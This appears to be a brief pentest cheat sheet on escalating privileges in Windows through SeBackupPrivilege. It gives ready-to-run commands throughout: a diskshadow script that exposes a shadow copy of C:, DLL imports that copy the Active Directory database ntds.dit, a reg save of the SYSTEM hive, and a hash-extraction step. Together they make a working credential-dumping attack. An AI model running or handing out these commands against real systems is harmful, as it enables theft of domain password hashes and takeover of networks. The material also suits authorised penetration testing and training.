In the Open

SEBackupPrivilege Escalation

  • Check user privileges to escalate


  • Check whoami /all
  • SeBackupPrivilege must be present
  • Payloads all the things
  • Upload diskshadow.txt to the target with the following content, there has to be a space at the end of each line!!!!
set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
expose %someAlias% h: 
  • Change dir to C:\Windows\System32 and diskshadow.exe /s C:\tmp\diskshadow.txt
  • Upload these dlls to the target
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM C:\tmp\system
  • Downloads the files ntds.dit and system
  • Extract the hashes via -system system -ntds ntds.dit LOCAL > out.txt